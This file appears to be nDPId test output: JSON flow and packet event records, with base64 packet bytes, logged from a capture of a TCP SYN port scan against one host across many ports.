-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAscfMAADcGn3+sEAAIQA2GNIzTOpjdU4MZAAAAAGACEADt8wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsPqgAADcG0sqsEAAIQA2GNIzTBEPdU4MZAAAAAGACEAAkSQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAs3asAACwGPsesEAAIQA2GNIzTE+zdU4MZAAAAAGACBAAgoAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsx0oAADsGRiisEAAIQA2GNIzTAgzdU4MZAAAAAGACEAAmgAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAst5EAADAGYOGsEAAIQA2GNIzSBPjdUoMYAAAAAGACBAAvlwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsk4oAADEGg+isEAAIQA2GNIzSIsPdUoMYAAAAAGACCAANzAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsNBsAACwG6FesEAAIQA2GNIzSBGHdUoMYAAAAAGACBAAwLgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ0AAACYG3zKsEAAIQA2GNIzSJyjdUoMYAAAAAGACDAAFZwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsch0AADoGnFWsEAAIQA2GNIzSF3PdUoMYAAAAAGACDAAVHAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsfdEAACcGo6GsEAAIQA2GNIzSH5jdUoMYAAAAAGACEAAI9wAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAs808AADYGHyOsEAAIQA2GNIzSoifdUoMYAAAAAGACDACKZwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsApcAACsGGtysEAAIQA2GNIzSFLLdUoMYAAAAAGACEAAT3QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsVuIAADgGuZCsEAAIQA2GNIzSBrXdUoMYAAAAAGACBAAt2gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsSbwAADoGxLasEAAIQA2GNIzSACvdUoMYAAAAAGACDAAsZAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAs1IAAACkGSvKsEAAIQA2GNIzSBGLdUoMYAAAAAGACCAAsLQAAAgQFtA=="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1233,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_packet_id":2,"flow_last_seen":1278275060352,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275060352,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACABGjNKWQmY93VKDGVAUAABTcgAAAAAAAAAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060355,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_packet_id":1,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060355,"pkt":"ACYLMQczACWzv5HuCABFAAAs6tAAADUGKKKsEAAIQA2GNIzSAsfdUoMYAAAAAGACCAAtyAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060355,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_packet_id":1,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060355,"pkt":"ACYLMQczACWzv5HuCABFAAAs8NEAACcGMKGsEAAIQA2GNIzSgAHdUoMYAAAAAGACEACojQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsldQAADsGd56sEAAIQA2GNIzTDLzdU4MZAAAAAGACEAAb0AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsbQQAADkGom6sEAAIQA2GNIzTBJfdU4MZAAAAAGACCAAr9QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsM\/UAADUG332sEAAIQA2GNIzTE7rdU4MZAAAAAGACCAAc0gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAs+SIAACoGJVCsEAAIQA2GNIzTBFHdU4MZAAAAAGACDAAoOwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsLpUAAC8G6t2sEAAIQA2GNIzTgAXdU4MZAAAAAGACEACohgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsXoEAADMGtvGsEAAIQA2GNIzTH0fdU4MZAAAAAGACEAAJRQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs3G0AADcGNQWsEAAIQA2GNIzTNdfdU4MZAAAAAGACEADytAAAAgQFtA=="} 